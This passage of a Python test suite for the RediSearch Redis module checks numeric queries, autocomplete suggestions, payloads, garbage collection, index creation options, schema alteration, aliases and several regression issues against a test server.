'ft.search', 'idx', 'hello kitty @score:[0 100]', "nocontent")
env.assertEqual(11, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[0 50]', "nocontent")
env.assertEqual(51, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(49, res[0])
res = r.execute_command(
'ft.search', 'idx', '@score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(49, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty -@score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(51, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[-inf +inf]', "nocontent")
env.assertEqual(100, res[0])
def testSuggestions(env):
r = env
r.expect('ft.SUGADD', 'ac', 'hello world', 1).equal(1)
r.expect('ft.SUGADD', 'ac', 'hello world', 1, 'INCR').equal(1)
res = r.execute_command("FT.SUGGET", "ac", "hello")
env.assertEqual(1, len(res))
env.assertEqual("hello world", res[0])
terms = ["hello werld", "hallo world",
"yellow world", "wazzup", "herp", "derp"]
sz = 2
for term in terms:
r.expect('ft.SUGADD', 'ac', term, sz - 1).equal(sz)
sz += 1
for _ in r.retry_with_rdb_reload():
r.expect('ft.SUGLEN', 'ac').equal(7)
# search not fuzzy
r.expect("ft.SUGGET", "ac", "hello").equal(["hello world", "hello werld"])
# print r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1", "WITHSCORES")
# search fuzzy - shuold yield more results
r.expect("ft.SUGGET", "ac", "hello", "FUZZY")\
.equal(['hello world', 'hello werld', 'yellow world', 'hallo world'])
# search fuzzy with limit of 1
r.expect("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1").equal(['hello world'])
# scores should return on WITHSCORES
res = r.execute_command("ft.SUGGET", "ac", "hello", "WITHSCORES")
env.assertEqual(4, len(res))
env.assertTrue(float(res[1]) > 0)
env.assertTrue(float(res[3]) > 0)
r.expect("ft.SUGDEL", "ac", "hello world").equal(1L)
r.expect("ft.SUGDEL", "ac", "world").equal(0L)
r.expect("ft.SUGGET", "ac", "hello").equal(['hello werld'])
def testSuggestErrors(env):
env.expect('ft.SUGADD ac olah 1').equal(1)
env.expect('ft.SUGADD ac olah 1 INCR').equal(1)
env.expect('ft.SUGADD ac missing').error().contains("wrong number of arguments")
env.expect('ft.SUGADD ac olah not_a_number').error().contains("invalid score")
env.expect('ft.SUGADD ac olah 1 PAYLOAD').error().contains('Invalid payload: Expected an argument, but none provided')
env.expect('ft.SUGADD ac olah 1 REDIS PAYLOAD payload').error().contains('Unknown argument `REDIS`')
env.expect('ft.SUGGET ac olah FUZZ').error().contains("Unrecognized argument: FUZZ")
query = 'verylongquery'
for _ in range(3):
query += query
env.expect('ft.SUGGET ac', query).error().contains("Invalid query")
env.expect('ft.SUGGET ac', query + query).error().contains("Invalid query length")
def testSuggestPayload(env):
r = env
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1, 'PAYLOAD', 'foo'))
env.assertEqual(2, r.execute_command(
'ft.SUGADD', 'ac', 'hello werld', 1, 'PAYLOAD', 'bar'))
env.assertEqual(3, r.execute_command(
'ft.SUGADD', 'ac', 'hello nopayload', 1, 'PAYLOAD', ''))
env.assertEqual(4, r.execute_command(
'ft.SUGADD', 'ac', 'hello nopayload2', 1))
res = r.execute_command("FT.SUGGET", "ac", "hello", 'WITHPAYLOADS')
env.assertListEqual(['hello world', 'foo', 'hello werld', 'bar', 'hello nopayload', None, 'hello nopayload2', None],
res)
res = r.execute_command("FT.SUGGET", "ac", "hello")
env.assertListEqual(['hello world', 'hello werld', 'hello nopayload', 'hello nopayload2'],
res)
res = r.execute_command(
"FT.SUGGET", "ac", "hello", 'WITHPAYLOADS', 'WITHSCORES')
# we don't compare the scores beause they may change
env.assertEqual(12, len(res))
def testPayload(env):
r = env
env.expect('ft.create', 'idx', 'ON', 'HASH', 'PAYLOAD_FIELD', '__payload', 'schema', 'f', 'text').ok()
for i in range(10):
r.expect('ft.add', 'idx', '%d' % i, 1.0,
'payload', 'payload %d' % i,
'fields', 'f', 'hello world').ok()
for x in r.retry_with_rdb_reload():
waitForIndex(env, 'idx')
res = r.execute_command('ft.search', 'idx', 'hello world')
r.assertEqual(21, len(res))
res = r.execute_command('ft.search', 'idx', 'hello world', 'withpayloads')
r.assertEqual(31, len(res))
r.assertEqual(10, res[0])
for i in range(1, 30, 3):
r.assertEqual(res[i + 1], 'payload %s' % res[i])
def testGarbageCollector(env):
env.skipOnCluster()
if env.moduleArgs is not None and 'GC_POLICY FORK' in env.moduleArgs:
# this test is not relevent for fork gc cause its not cleaning the last block
raise unittest.SkipTest()
N = 100
r = env
r.expect('ft.create', 'idx', 'ON', 'HASH', 'schema', 'foo', 'text').ok()
waitForIndex(r, 'idx')
for i in range(N):
r.expect('ft.add', 'idx', 'doc%d' % i, 1.0,
'fields', 'foo', ' '.join(('term%d' % random.randrange(0, 10) for i in range(10)))).ok()
def get_stats(r):
res = r.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
gc_stats = {d['gc_stats'][x]: float(
d['gc_stats'][x + 1]) for x in range(0, len(d['gc_stats']), 2)}
d['gc_stats'] = gc_stats
return d
stats = get_stats(r)
if 'current_hz' in stats['gc_stats']:
env.assertGreater(stats['gc_stats']['current_hz'], 8)
env.assertEqual(0, stats['gc_stats']['bytes_collected'])
env.assertGreater(int(stats['num_records']), 0)
initialIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
for i in range(N):
r.expect('ft.del', 'idx', 'doc%d' % i).equal(1)
for _ in range(100):
# gc is random so we need to do it long enough times for it to work
env.cmd('ft.debug', 'GC_FORCEINVOKE', 'idx')
stats = get_stats(r)
env.assertEqual(0, int(stats['num_docs']))
env.assertEqual(0, int(stats['num_records']))
if not env.is_cluster():
env.assertEqual(100, int(stats['max_doc_id']))
if 'current_hz' in stats['gc_stats']:
env.assertGreater(stats['gc_stats']['current_hz'], 30)
currentIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
# print initialIndexSize, currentIndexSize,
# stats['gc_stats']['bytes_collected']
env.assertGreater(initialIndexSize, currentIndexSize)
env.assertGreater(stats['gc_stats'][
'bytes_collected'], currentIndexSize)
for i in range(10):
res = r.execute_command('ft.search', 'idx', 'term%d' % i)
env.assertEqual([0], res)
def testReturning(env):
env.assertCmdOk('ft.create', 'idx', 'ON', 'HASH', 'schema',
'f1', 'text',
'f2', 'text',
'n1', 'numeric', 'sortable',
'f3', 'text')
for i in range(10):
env.assertCmdOk('ft.add', 'idx', 'DOC_{0}'.format(i), 1.0, 'fields',
'f2', 'val2', 'f1', 'val1', 'f3', 'val3',
'n1', i)
# RETURN 0. Simplest case
for x in env.retry_with_reload():
waitForIndex(env, 'idx')
res = env.cmd('ft.search', 'idx', 'val*', 'return', '0')
env.assertEqual(11, len(res))
env.assertEqual(10, res[0])
for r in res[1:]:
env.assertTrue(r.startswith('DOC_'))
for field in ('f1', 'f2', 'f3', 'n1'):
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, field)
env.assertEqual(21, len(res))
env.assertEqual(10, res[0])
for pair in grouper(res[1:], 2):
docname, fields = pair
env.assertEqual(2, len(fields))
env.assertEqual(field, fields[0])
env.assertTrue(docname.startswith('DOC_'))
# Test that we don't return SORTBY fields if they weren't specified
# also in RETURN
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'f1',
'sortby', 'n1', 'ASC')
row = res[2]
# get the first result
env.assertEqual(['f1', 'val1'], row)
# Test when field is not found
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'nonexist')
env.assertEqual(21, len(res))
env.assertEqual(10, res[0])
# # Test that we don't crash if we're given the wrong number of fields
with env.assertResponseError():
res = env.cmd('ft.search', 'idx', 'val*', 'return', 700, 'nonexist')
def _test_create_options_real(env, *options):
options = [x for x in options if x]
has_offsets = 'NOOFFSETS' not in options
has_fields = 'NOFIELDS' not in options
has_freqs = 'NOFREQS' not in options
try:
env.cmd('ft.drop', 'idx')
# RS 2.0 ft.drop does not remove documents
env.flush()
except Exception as e:
pass
options = ['idx'] + options + ['ON', 'HASH', 'schema', 'f1', 'text', 'f2', 'text']
env.assertCmdOk('ft.create', *options)
for i in range(10):
env.assertCmdOk('ft.add', 'idx', 'doc{}'.format(
i), 0.5, 'fields', 'f1', 'value for {}'.format(i))
# Query
# res = env.cmd('ft.search', 'idx', "value for 3")
# if not has_offsets:
# env.assertIsNone(res)
# else:
# env.assertIsNotNone(res)
# Frequencies:
env.assertCmdOk('ft.add', 'idx', 'doc100',
1.0, 'fields', 'f1', 'foo bar')
env.assertCmdOk('ft.add', 'idx', 'doc200', 1.0,
'fields', 'f1', ('foo ' * 10) + ' bar')
res = env.cmd('ft.search', 'idx', 'foo')
env.assertEqual(2, res[0])
if has_offsets:
docname = res[1]
if has_freqs:
env.assertEqual('doc200', docname)
else:
env.assertEqual('doc100', docname)
env.assertCmdOk('ft.add', 'idx', 'doc300',
1.0, 'fields', 'f1', 'Hello')
res = env.cmd('ft.search', 'idx', '@f2:Hello')
if has_fields:
env.assertEqual(1, len(res))
else:
env.assertEqual(3, len(res))
def testCreationOptions(env):
from itertools import combinations
for x in range(1, 5):
for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
_test_create_options_real(env, *combo)
env.expect('ft.create', 'idx').error()
def testInfoCommand(env):
from itertools import combinations
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'NOFIELDS', 'schema', 'title', 'text'))
N = 50
for i in xrange(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'replace', 'fields',
'title', 'hello term%d' % i))
for _ in r.retry_with_rdb_reload():
waitForIndex(env, 'idx')
res = r.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(d['index_name'], 'idx')
env.assertEqual(d['index_options'], ['NOFIELDS'])
env.assertListEqual(
d['fields'], [['title', 'type', 'TEXT', 'WEIGHT', '1']])
if not env.is_cluster():
env.assertEquals(int(d['num_docs']), N)
env.assertEquals(int(d['num_terms']), N + 1)
env.assertEquals(int(d['max_doc_id']), N)
env.assertEquals(int(d['records_per_doc_avg']), 2)
env.assertEquals(int(d['num_records']), N * 2)
env.assertGreater(float(d['offset_vectors_sz_mb']), 0)
env.assertGreater(float(d['key_table_size_mb']), 0)
env.assertGreater(float(d['inverted_sz_mb']), 0)
env.assertGreater(float(d['bytes_per_record_avg']), 0)
env.assertGreater(float(d['doc_table_size_mb']), 0)
for x in range(1, 5):
for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
combo = list(filter(None, combo))
options = combo + ['schema', 'f1', 'text']
try:
env.cmd('ft.drop', 'idx')
except:
pass
env.assertCmdOk('ft.create', 'idx', 'ON', 'HASH', *options)
info = env.cmd('ft.info', 'idx')
ix = info.index('index_options')
env.assertFalse(ix == -1)
opts = info[ix + 1]
# make sure that an empty opts string returns no options in
# info
if not combo:
env.assertListEqual([], opts)
for option in filter(None, combo):
env.assertTrue(option in opts)
def testNoStem(env):
env.cmd('ft.create', 'idx', 'ON', 'HASH',
'schema', 'body', 'text', 'name', 'text', 'nostem')
if not env.isCluster():
# todo: change it to be more generic to pass on is_cluster
res = env.cmd('ft.info', 'idx')
env.assertEqual(res[7][1][5], 'NOSTEM')
for _ in env.retry_with_reload():
waitForIndex(env, 'idx')
try:
env.cmd('ft.del', 'idx', 'doc')
except redis.ResponseError:
pass
# Insert a document
env.assertCmdOk('ft.add', 'idx', 'doc', 1.0, 'fields',
'body', "located",
'name', "located")
# Now search for the fields
res_body = env.cmd('ft.search', 'idx', '@body:location')
res_name = env.cmd('ft.search', 'idx', '@name:location')
env.assertEqual(0, res_name[0])
env.assertEqual(1, res_body[0])
def testSortbyMissingField(env):
# GH Issue 131
env.cmd('ft.create', 'ix', 'ON', 'HASH', 'schema', 'txt',
'text', 'num', 'numeric', 'sortable')
env.cmd('ft.add', 'ix', 'doc1', 1.0, 'fields', 'txt', 'foo')
env.cmd('ft.search', 'ix', 'foo', 'sortby', 'num')
def testParallelIndexing(env):
# GH Issue 207
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 'txt', 'text')
from threading import Thread
env.getConnection()
ndocs = 100
def runner(tid):
cli = env.getConnection()
for num in range(ndocs):
cli.execute_command('ft.add', 'idx', 'doc{}_{}'.format(tid, num), 1.0,
'fields', 'txt', 'hello world' * 20)
ths = []
for tid in range(10):
ths.append(Thread(target=runner, args=(tid,)))
[th.start() for th in ths]
[th.join() for th in ths]
res = env.cmd('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(1000, int(d['num_docs']))
def testDoubleAdd(env):
# Tests issue #210
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 'txt', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'hello world')
with env.assertResponseError():
env.cmd('ft.add', 'idx', 'doc1', 1.0,
'fields', 'txt', 'goodbye world')
env.assertEqual('hello world', env.cmd('ft.get', 'idx', 'doc1')[1])
env.assertEqual(0, env.cmd('ft.search', 'idx', 'goodbye')[0])
env.assertEqual(1, env.cmd('ft.search', 'idx', 'hello')[0])
# Now with replace
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'replace',
'fields', 'txt', 'goodbye world')
env.assertEqual(1, env.cmd('ft.search', 'idx', 'goodbye')[0])
env.assertEqual(0, env.cmd('ft.search', 'idx', 'hello')[0])
env.assertEqual('goodbye world', env.cmd('ft.get', 'idx', 'doc1')[1])
def testConcurrentErrors(env):
from multiprocessing import Process
import random
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 'txt', 'text')
docs_per_thread = 100
num_threads = 50
docIds = ['doc{}'.format(x) for x in range(docs_per_thread)]
def thrfn():
myIds = docIds[::]
random.shuffle(myIds)
cli = env.getConnection()
with cli.pipeline(transaction=False) as pl:
for x in myIds:
pl.execute_command('ft.add', 'idx', x, 1.0,
'fields', 'txt', ' hello world ' * 50)
try:
pl.execute()
except Exception as e:
pass
# print e
thrs = [Process(target=thrfn) for x in range(num_threads)]
[th.start() for th in thrs]
[th.join() for th in thrs]
res = env.cmd('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(100, int(d['num_docs']))
def testBinaryKeys(env):
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 'txt', 'text')
# Insert a document
env.cmd('ft.add', 'idx', 'Hello', 1.0, 'fields', 'txt', 'NoBin match')
env.cmd('ft.add', 'idx', 'Hello\x00World', 1.0, 'fields', 'txt', 'Bin match')
for _ in env.reloading_iterator():
waitForIndex(env, 'idx')
exp = [2L, 'Hello\x00World', ['txt', 'Bin match'], 'Hello', ['txt', 'NoBin match']]
res = env.cmd('ft.search', 'idx', 'match')
for r in res:
env.assertIn(r, exp)
def testNonDefaultDb(env):
if env.is_cluster():
raise unittest.SkipTest()
# Should be ok
env.cmd('FT.CREATE', 'idx1', 'ON', 'HASH', 'schema', 'txt', 'text')
try:
env.cmd('SELECT 1')
except redis.ResponseError:
return
# Should fail
with env.assertResponseError():
env.cmd('FT.CREATE', 'idx2', 'ON', 'HASH', 'schema', 'txt', 'text')
def testDuplicateNonspecFields(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'schema', 'txt', 'text').ok()
env.expect('FT.ADD', 'idx', 'doc', 1.0, 'fields',
'txt', 'foo', 'f1', 'f1val', 'f1', 'f1val2', 'F1', 'f1Val3').ok()
res = env.cmd('ft.get', 'idx', 'doc')
res = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertTrue(res['f1'] in ('f1val', 'f1val2'))
env.assertEqual('f1Val3', res['F1'])
def testDuplicateFields(env):
# As of RS 2.0 it is allowed. only latest field will be saved and indexed
env.cmd('FT.CREATE', 'idx', 'ON', 'HASH',
'SCHEMA', 'txt', 'TEXT', 'num', 'NUMERIC', 'SORTABLE')
env.expect('FT.ADD', 'idx', 'doc', 1.0, 'FIELDS',
'txt', 'foo', 'txt', 'bar', 'txt', 'baz').ok()
env.expect('FT.SEARCH idx *').equal([1L, 'doc', ['txt', 'baz']])
def testDuplicateSpec(env):
with env.assertResponseError():
env.cmd('FT.CREATE', 'idx', 'ON', 'HASH',
'SCHEMA', 'f1', 'text', 'n1', 'numeric', 'f1', 'text')
def testSortbyMissingFieldSparse(env):
# Note, the document needs to have one present sortable field in
# order for the indexer to give it a sort vector
env.cmd('ft.create', 'idx', 'ON', 'HASH',
'SCHEMA', 'lastName', 'text', 'SORTABLE', 'firstName', 'text', 'SORTABLE')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'lastName', 'mark')
res = env.cmd('ft.search', 'idx', 'mark', 'WITHSORTKEYS', "SORTBY",
"firstName", "ASC", "limit", 0, 100)
# commented because we don't filter out exclusive sortby fields
# env.assertEqual([1L, 'doc1', None, ['lastName', 'mark']], res)
def testLuaAndMulti(env):
env.skip() # addhash isn't supported
if env.is_cluster():
raise unittest.SkipTest()
# Ensure we can work in Lua and Multi environments without crashing
env.cmd('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'f1', 'text', 'n1', 'numeric')
env.cmd('HMSET', 'hashDoc', 'f1', 'v1', 'n1', 4)
env.cmd('HMSET', 'hashDoc2', 'f1', 'v1', 'n1', 5)
r = env.getConnection()
r.eval("return redis.call('ft.add', 'idx', 'doc1', 1.0, 'fields', 'f1', 'bar')", "0")
r.eval("return redis.call('ft.addhash', 'idx', 'hashDoc', 1.0)", 0)
# Try in a pipeline:
with r.pipeline(transaction=True) as pl:
pl.execute_command('ft.add', 'idx', 'doc2',
1.0, 'fields', 'f1', 'v3')
pl.execute_command('ft.add', 'idx', 'doc3',
1.0, 'fields', 'f1', 'v4')
pl.execute_command('ft.addhash', 'idx', 'hashdoc2', 1.0)
pl.execute()
def testLanguageField(env):
env.cmd('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'language', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0,
'FIELDS', 'language', 'gibberish')
res = env.cmd('FT.SEARCH', 'idx', 'gibberish')
env.assertEqual([1L, 'doc1', ['language', 'gibberish']], res)
# The only way I can verify that LANGUAGE is parsed twice is ensuring we
# provide a wrong language. This is much easier to test than trying to
# figure out how a given word is stemmed
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'LANGUAGE',
'blah', 'FIELDS', 'language', 'gibber')
def testUninitSortvector(env):
# This would previously crash
env.cmd('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'f1', 'TEXT')
for x in range(2000):
env.cmd('FT.ADD', 'idx', 'doc{}'.format(
x), 1.0, 'FIELDS', 'f1', 'HELLO')
env.broadcast('SAVE')
for x in range(10):
env.broadcast('DEBUG RELOAD')
def normalize_row(row):
return to_dict(row)
def assertAggrowsEqual(env, exp, got):
env.assertEqual(exp[0], got[0])
env.assertEqual(len(exp), len(got))
# and now, it's just free form:
exp = sorted(to_dict(x) for x in exp[1:])
got = sorted(to_dict(x) for x in got[1:])
env.assertEqual(exp, got)
def assertResultsEqual(env, exp, got, inorder=True):
from pprint import pprint
# pprint(exp)
# pprint(got)
env.assertEqual(exp[0], got[0])
env.assertEqual(len(exp), len(got))
exp = list(grouper(exp[1:], 2))
got = list(grouper(got[1:], 2))
for x in range(len(exp)):
exp_did, exp_fields = exp[x]
got_did, got_fields = got[x]
env.assertEqual(exp_did, got_did, message="at position {}".format(x))
got_fields = to_dict(got_fields)
exp_fields = to_dict(exp_fields)
env.assertEqual(exp_fields, got_fields, message="at position {}".format(x))
def testAlterIndex(env):
env.cmd('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'f1', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f2', 'TEXT')
waitForIndex(env, 'idx')
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
# RS 2.0 reindex and after reload both documents are found
# for _ in env.retry_with_reload():
res = env.cmd('FT.SEARCH', 'idx', 'world')
env.assertEqual(toSortedFlatList(res), toSortedFlatList([2L, 'doc2', ['f1', 'hello', 'f2', 'world'], 'doc1', ['f1', 'hello', 'f2', 'world']]))
# env.assertEqual([1, 'doc2', ['f1', 'hello', 'f2', 'world']], ret)
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f3', 'TEXT', 'SORTABLE')
for x in range(10):
env.cmd('FT.ADD', 'idx', 'doc{}'.format(x + 3), 1.0,
'FIELDS', 'f1', 'hello', 'f3', 'val{}'.format(x))
for _ in env.retry_with_reload():
waitForIndex(env, 'idx')
# Test that sortable works
res = env.cmd('FT.SEARCH', 'idx', 'hello', 'SORTBY', 'f3', 'DESC')
exp = [12, 'doc12', ['f1', 'hello', 'f3', 'val9'], 'doc11', ['f1', 'hello', 'f3', 'val8'],
'doc10', ['f1', 'hello', 'f3', 'val7'], 'doc9', ['f1', 'hello', 'f3', 'val6'],
'doc8', ['f1', 'hello', 'f3', 'val5'], 'doc7', ['f1', 'hello', 'f3', 'val4'],
'doc6', ['f1', 'hello', 'f3', 'val3'], 'doc5', ['f1', 'hello', 'f3', 'val2'],
'doc4', ['f1', 'hello', 'f3', 'val1'], 'doc3', ['f1', 'hello', 'f3', 'val0']]
assertResultsEqual(env, exp, res)
# Test that we can add a numeric field
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'n1', 'NUMERIC')
env.cmd('FT.ADD', 'idx', 'docN1', 1.0, 'FIELDS', 'n1', 50)
env.cmd('FT.ADD', 'idx', 'docN2', 1.0, 'FIELDS', 'n1', 250)
for _ in env.retry_with_reload():
waitForIndex(env, 'idx')
res = env.cmd('FT.SEARCH', 'idx', '@n1:[0 100]')
env.assertEqual([1, 'docN1', ['n1', '50']], res)
env.expect('FT.ALTER', 'idx', 'SCHEMA', 'NOT_ADD', 'f2', 'TEXT').error()
env.expect('FT.ALTER', 'idx', 'SCHEMA', 'ADD').error()
env.expect('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f2').error()
def testAlterValidation(env):
# Test that constraints for ALTER comand
env.cmd('FT.CREATE', 'idx1', 'ON', 'HASH', 'SCHEMA', 'f0', 'TEXT')
for x in range(1, 32):
env.cmd('FT.ALTER', 'idx1', 'SCHEMA', 'ADD', 'f{}'.format(x), 'TEXT')
# OK for now.
# Should be too many indexes
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
'idx1', 'SCHEMA', 'ADD', 'tooBig', 'TEXT')
env.cmd('FT.CREATE', 'idx2', 'MAXTEXTFIELDS', 'ON', 'HASH', 'SCHEMA', 'f0', 'TEXT')
# print env.cmd('FT.INFO', 'idx2')
for x in range(1, 50):
env.cmd('FT.ALTER', 'idx2', 'SCHEMA', 'ADD', 'f{}'.format(x + 1), 'TEXT')
env.cmd('FT.ADD', 'idx2', 'doc1', 1.0, 'FIELDS', 'f50', 'hello')
for _ in env.retry_with_reload():
waitForIndex(env, 'idx2')
ret = env.cmd('FT.SEARCH', 'idx2', '@f50:hello')
env.assertEqual([1, 'doc1', ['f50', 'hello']], ret)
env.cmd('FT.CREATE', 'idx3', 'ON', 'HASH', 'SCHEMA', 'f0', 'text')
# Try to alter the index with garbage
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx3',
'SCHEMA', 'ADD', 'f1', 'TEXT', 'f2', 'garbage')
ret = to_dict(env.cmd('ft.info', 'idx3'))
env.assertEqual(1, len(ret['fields']))
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
'nonExist', 'SCHEMA', 'ADD', 'f1', 'TEXT')
# test with no fields!
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx2', 'SCHEMA', 'ADD')
# test with no fields!
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx2', 'SCHEMA', 'ADD')
def testIssue366_2(env):
# FT.CREATE atest SCHEMA textfield TEXT numfield NUMERIC
# FT.ADD atest anId 1 PAYLOAD '{"hello":"world"}' FIELDS textfield sometext numfield 1234
# FT.ADD atest anId 1 PAYLOAD '{"hello":"world2"}' REPLACE PARTIAL FIELDS numfield 1111
# shutdown
env.cmd('FT.CREATE', 'idx1', 'ON', 'HASH',
'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
env.cmd('FT.ADD', 'idx1', 'doc1', 1, 'PAYLOAD', '{"hello":"world"}',
'FIELDS', 'textfield', 'sometext', 'numfield', 1234)
env.cmd('ft.add', 'idx1', 'doc1', 1,
'PAYLOAD', '{"hello":"world2"}',
'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 'sometext', 'numfield', 1111)
for _ in env.retry_with_reload():
pass #
def testIssue654(env):
# Crashes during FILTER
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 'id', 'numeric')
env.cmd('ft.add', 'idx', 1, 1, 'fields', 'id', 1)
env.cmd('ft.add', 'idx', 2, 1, 'fields', 'id', 2)
res = env.cmd('ft.search', 'idx', '*', 'filter', '@version', 0, 2)
def testReplaceReload(env):
env.cmd('FT.CREATE', 'idx2', 'ON', 'HASH',
'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
# Create a document and then replace it.
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'FIELDS', 'textfield', 's1', 'numfield', 99)
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 's100', 'numfield', 990)
env.dump_and_reload()
# RDB Should still be fine
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 's200', 'numfield', 1090)
doc = to_dict(env.cmd('FT.GET', 'idx2', 'doc2'))
env.assertEqual('s200', doc['textfield'])
env.assertEqual('1090', doc['numfield'])
# command = 'FT.CREATE idx SCHEMA '
# for i in range(255):
# command += 't%d NUMERIC SORTABLE ' % i
# command = command[:-1]
# r.execute_command(command)
# r.execute_command('save')
# // reload from ...
# r.execute_command('FT.ADD idx doc1 1.0 FIELDS t0 1')
def testIssue417(env):
command = ['ft.create', 'idx', 'ON', 'HASH', 'schema']
for x in range(255):
command += ['t{}'.format(x), 'numeric', 'sortable']
command = command[:-1]
env.cmd(*command)
for _ in env.reloading_iterator():
waitForIndex(env, 'idx')
try:
env.execute_command('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 't0', '1')
except redis.ResponseError as e:
env.assertTrue('already' in e.message.lower())
# >FT.CREATE myIdx SCHEMA title TEXT WEIGHT 5.0 body TEXT url TEXT
# >FT.ADD myIdx doc1 1.0 FIELDS title "hello world" body "lorem ipsum" url "www.google.com"
# >FT.SEARCH myIdx "no-as"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
# >FT.SEARCH myIdx "no-as"
# (error) Unknown Index name
def testIssue422(env):
env.cmd('ft.create', 'myIdx', 'ON', 'HASH', 'schema',
'title', 'TEXT', 'WEIGHT', '5.0',
'body', 'TEXT',
'url', 'TEXT')
env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'FIELDS', 'title', 'hello world', 'bod', 'lorem ipsum', 'url', 'www.google.com')
rv = env.cmd('ft.search', 'myIdx', 'no-as')
env.assertEqual([0], rv)
def testIssue446(env):
env.cmd('ft.create', 'myIdx', 'ON', 'HASH', 'schema',
'title', 'TEXT', 'SORTABLE')
env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'fields', 'title', 'hello world', 'body', 'lorem ipsum', 'url', '"www.google.com')
rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
env.assertEqual([1], rv)
# Related - issue 635
env.cmd('ft.add', 'myIdx', 'doc2', '1.0', 'fields', 'title', 'hello')
rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
env.assertEqual([2], rv)
def testTimeoutSettings(env):
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 't1', 'text')
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'BLAHBLAH').raiseError()
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'RETURN').notRaiseError()
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'FAIL').notRaiseError()
def testAlias(env):
conn = getConnectionByEnv(env)
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'PREFIX', 1, 'doc1', 'schema', 't1', 'text')
env.cmd('ft.create', 'idx2', 'ON', 'HASH', 'PREFIX', 1, 'doc2', 'schema', 't1', 'text')
env.expect('ft.aliasAdd', 'myIndex').raiseError()
env.expect('ft.aliasupdate', 'fake_alias', 'imaginary_alias', 'Too_many_args').raiseError()
env.cmd('ft.aliasAdd', 'myIndex', 'idx')
env.cmd('ft.add', 'myIndex', 'doc1', 1.0, 'fields', 't1', 'hello')
r = env.cmd('ft.search', 'idx', 'hello')
env.assertEqual([1, 'doc1', ['t1', 'hello']], r)
r2 = env.cmd('ft.search', 'myIndex', 'hello')
env.assertEqual(r, r2)
# try to add the same alias again; should be an error
env.expect('ft.aliasAdd', 'myIndex', 'idx2').raiseError()
env.expect('ft.aliasAdd', 'alias2', 'idx').notRaiseError()
# now delete the index
env.cmd('ft.drop', 'myIndex')
# RS2 does not delete doc on ft.drop
